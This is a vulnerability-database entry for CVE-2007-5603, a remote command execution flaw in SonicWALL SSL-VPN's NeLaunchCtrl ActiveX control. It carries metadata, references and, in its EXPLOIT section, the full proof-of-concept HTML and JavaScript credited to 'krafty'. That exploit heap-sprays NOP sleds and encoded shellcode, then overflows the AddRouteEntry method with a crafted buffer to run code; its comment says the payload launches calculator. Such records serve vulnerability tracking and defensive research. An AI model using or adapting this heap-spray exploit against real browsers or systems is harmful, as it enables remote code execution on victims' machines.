ID
VAR-E-200711-0034
CVE
| cve_id: | CVE-2007-5603 | Trust: 2.1 |
EDB ID
4594
TITLE
SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution - Windows remote Exploit
Trust: 0.6
DESCRIPTION
SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution. CVE-39069CVE-2007-5603 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | sonicwall | model: | ssl-vpn | scope: | - | version: | - | Trust: 1.0 |
| vendor: | sonicwall | model: | ssl-vpn netextender activex control | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
<!--
SonicWall SSL-VPN NeLaunchCtrl ActiveX Control exploit.
by krafty
greets to SK, muts, halvar, grugq, and all the ethnical hackers
sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
Bring back the days of technotronic and r00tshell! Freedom.
poc: launches calculator.
Tested with IE6 XP SP2. I'm sure it works with IE7 and Vista and all
that jing-bang.
-->
<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>
<script>
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray += spray;
} while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i++)
memory[i] = spray + shellcode;
buf = "";
for(i = 0; i < 50; i++)
buf += unescape("%05%05%05%05");
nelx.AddRouteEntry("", buf);
</script>
# milw0rm.com [2007-11-01]
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'NeLaunchCtrl' ActiveX Control Remote Command Execution
Trust: 1.0
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
CREDITS
krafty
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2007-5603 | Trust: 2.1 |
| db: | EXPLOIT-DB | id: | 4594 | Trust: 1.6 |
| db: | EDBNET | id: | 28908 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 83233 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2007-5603 | Trust: 2.1 |
| url: | https://www.exploit-db.com/exploits/4594/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 83233 |
| db: | EXPLOIT-DB | id: | 4594 |
| db: | EDBNET | id: | 28908 |
LAST UPDATE DATE
2022-07-27T09:23:08.955000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 83233 | date: | 2009-11-26T00:34:53 |
| db: | EXPLOIT-DB | id: | 4594 | date: | 2007-11-01T00:00:00 |
| db: | EDBNET | id: | 28908 | date: | 2007-11-01T00:00:00 |